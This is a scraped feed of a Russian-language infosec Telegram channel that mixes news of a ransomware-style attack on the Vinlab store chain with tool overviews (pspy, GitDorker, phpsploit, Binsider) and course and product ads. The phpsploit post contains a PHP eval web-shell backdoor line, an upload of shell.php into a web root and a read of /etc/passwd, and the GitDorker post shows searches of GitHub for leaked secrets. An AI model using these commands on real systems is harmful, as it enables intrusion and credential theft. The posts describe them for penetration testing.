На днях сеть алкомаркетов «Винлаб» столкнулась с беспрецедентным инцидентом. Приостановлена работа всех магазинов «Винлаб».
Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании.
Последствия атаки:
🟣 Все розничные точки остаются закрытыми, на дверях размещены уведомления о «технических работах» без конкретных сроков возобновления деятельности
🟣 Официальный сайт сети недоступен
🟣 Клиенты столкнулись с «зависшими» заказами — оплаченный заказ не доставляется и статусы не обновляются
❗️ Владелец сети (Novabev Group) пока не даёт официальных комментариев. По данным инсайдеров, хакеры потребовали выкуп, но руководство отказалось выполнять их условия.
Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании.
Последствия атаки:
Please open Telegram to view this post
VIEW IN TELEGRAM
👾21🔥11👍4❤3🤔3😁1
pspy: Утилита для мониторинга процессов без привилегий root
❓ Основные возможности pspy
➡️ Мониторинг процессов в реальном времени:
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
➡️ Отслеживание задач cron:
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
➡️ Поддержка работы без root:
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
➡️ Совместимость с различными архитектурами:
• Доступен для x64, x86, ARM и других платформ.
➡️ Лёгкость и портативность:
• Выполняется как один бинарный файл без дополнительных зависимостей.
⬇️ Установка и использование
1️⃣ Скачивание pspy:
Загрузите подходящую версию с GitHub:
2️⃣ Запуск мониторинга:
Для наблюдения за процессами выполните:
3️⃣ Фильтрация событий:
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
pspy — это лёгкий и мощный инструмент с открытым исходным кодом, который позволяет отслеживать процессы на Linux-системах без необходимости обладания правами root. Это идеальный инструмент для анализа выполнения задач в реальном времени, поиска уязвимостей и оптимизации системных процессов.
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
• Доступен для x64, x86, ARM и других платформ.
• Выполняется как один бинарный файл без дополнительных зависимостей.
Загрузите подходящую версию с GitHub:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
Для наблюдения за процессами выполните:
./pspy64
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
./pspy64 | grep cron
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14👍10🔥9🤔1
Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.
Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.
Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:
git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt
Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤9🔥6
Extirpater
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
💡 Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
📎 Установка:
👩💻 Проект доступен в магазине F-droid:
👩💻 Исходный код:
📌 Использование:
Выбирете
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
https://f-droid.org/packages/us.spotco.extirpater/
https://github.com/divested-mobile/extirpater
Выбирете
Primary
или Secondary Storage
и нажмите кнопку Start
.Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍9🔥6
phpsploit: Мощный фреймворк для пентеста PHP-приложений
❓ Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.
⬇️ Установка и использование:
1️⃣ Установка phpsploit:
2️⃣ Настройка подключения:
3️⃣ Основные команды:
4️⃣ Пример эксплуатации:
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤7🔥5👎1
Взламываем мифы о безопасности Android
Знаете ли вы:
🟧 85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧 Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧 Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
✨ Разберете Android-приложения изнутри
✨ Освоите инструменты статического и динамического анализа
✨ Научитесь находить и устранять уязвимости на практике
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
🟠 Успейте записаться
✨ Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
🚀 По всем вопросам пишите @Codeby_Academy
Знаете ли вы:
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤7🔥6
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — PDF-библиотека
🎢 Категория Разное — Рекурсия
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤5
Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.
🔥27👍12❤8
Binsider
Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.
💡 Харакетеристики:
⏺️ Статический анализ - Позволяет анализировать структуру ELF, включая секции, сегменты, символы и перемещения.
⏺️ Динамический анализ - Возможность выполнения бинарного файла и отслеживания системных вызовов, сигналов и потока выполнения программы.
⏺️ Извлечение строк - Подобно команде strings, Binsider может извлекать строки из бинарного файла для поиска интересных данных, таких как URL, пароли и другая чувствительная информация.
⏺️ Hexdump - Предоставляет структурированный просмотр бинарного содержимого с возможностью анализа в шестнадцатеричном формате.
📎 Установка:
Использование:
Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh #Установка Rust
sudo apt install cargo
cargo install binsider
sudo cp /home/kali/.cargo/bin/binsider /bin
Использование:
binsider [PATH_TO_BINFILE]
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6❤5
Ваши данные уже в сети. Вы уверены, что они в безопасности?
Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов
Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга
✅ 92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 31 июля!
По всем вопросам @Codeby_Academy
Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов
Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга
По всем вопросам @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍7🔥6
Помните, «Величайший враг спрячется там, где вы будете меньше всего искать», поэтому ищите лучше!
Делитесь своими ответами и размышлениями в комментариях
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍7🔥6
Платформа DION — это не просто альтернатива привычным мессенджерам и видеосвязи. Это решение, где информационная безопасность встроена на уровне архитектуры.
Варианты размещения:
— Гибридное. Позволяет выносить медиатрафик и критичную информацию в контур заказчика.
— On-Premise. Развёртывание на стороне заказчика, локальное хранение, максимальная изоляция.
💻 Что важно для ИБ-специалистов:
— Шифрование и MFA.
— Интеграция с DLP и SIEM.
— Гибкий контроль доступа. Ролевые политики, настройка по отделам, проектам и уровням доступа.
— Безопасное хранение, резервное копирование и устойчивость к атакам.
— Обучение сотрудников для снижения человеческого фактора.
📌 DION — это не надстройка, а изначально безопасная UC-платформа.
Как её уже используют лидеры рынка?
🔘 Один из ТОП-5 банков проводит 15 000+ защищённых конференций в день
🔘 Крупнейший медиахолдинг применяет DION для прямых включений корреспондентов
🔘 Ведущая авиакомпания сократила время переключения между каналами и бронирует переговорки через DION.Rooms
📤 Попробуйте бесплатно.
Для компаний от 120+ пользователей — спецусловия.
Информация о рекламодателе.
Варианты размещения:
— Гибридное. Позволяет выносить медиатрафик и критичную информацию в контур заказчика.
— On-Premise. Развёртывание на стороне заказчика, локальное хранение, максимальная изоляция.
— Шифрование и MFA.
— Интеграция с DLP и SIEM.
— Гибкий контроль доступа. Ролевые политики, настройка по отделам, проектам и уровням доступа.
— Безопасное хранение, резервное копирование и устойчивость к атакам.
— Обучение сотрудников для снижения человеческого фактора.
Как её уже используют лидеры рынка?
Для компаний от 120+ пользователей — спецусловия.
Информация о рекламодателе.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍7🔥5👎1